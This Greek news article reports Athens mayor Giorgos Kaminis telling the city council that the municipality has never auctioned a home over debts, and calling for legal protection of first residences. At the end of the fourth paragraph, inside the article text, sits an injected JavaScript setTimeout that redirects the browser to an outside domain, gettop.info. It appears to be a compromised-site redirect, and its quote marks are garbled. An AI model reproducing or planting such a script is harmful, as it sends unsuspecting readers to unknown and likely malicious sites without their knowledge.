Καμίνης: Δεν έχει γίνει ποτέ πλειστηριασμός κατοικίας από τον δήμο Αθήνας

0
3

 

Eνημερώνοντας το δημοτικό συμβούλιο της Αθήνας, ο δήμαρχος Γιώργος Καμίνης αναφέρθηκε στο θέμα των πλειστηριασμών στον δήμο της Αθήνας σημειώνοντας: «Ο δήμος Αθήνας δεν έχει εκτελέσει ποτέ κανέναν πλειστηριασμό κατοικίας. Εξαντλεί κάθε δυνατότητα συνεννόησης με τον πολίτη που έχει οφειλές».

Σύμφωνα με τον δήμαρχο, «μικρό είναι το ποσοστό των πολιτών που δεν προσέρχεται σε διαδικασία ρύθμισης. Για τις περιπτώσεις αυτές, οι υπηρεσίες του δήμου Αθηναίων κάνουν, ως προς την διαδικασία, ότι προβλέπει ο Κώδικας Είσπραξης Δημοσίων Εσόδων».

Ο Γιώργος Καμίνης κάλεσε την κυβέρνηση «αν θέλει, ας προστατεύσει νομοθετικά την πρώτη κατοικία. Μόνος τρόπος, είπε, είναι να υπαχθούν και οι οφειλέτες του δημοσίου, όσον αφορά την προστασία της πρώτης κατοικίας, στον νόμο που διέπει τα χρέη στις τράπεζες».

Για τον λόγο αυτό, όπως σημείωσε, έχει ζητήσει συνάντηση με το οικονομικό επιτελείο της κυβέρνησης, προκειμένου να υποβάλει τις προτάσεις του δήμου. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here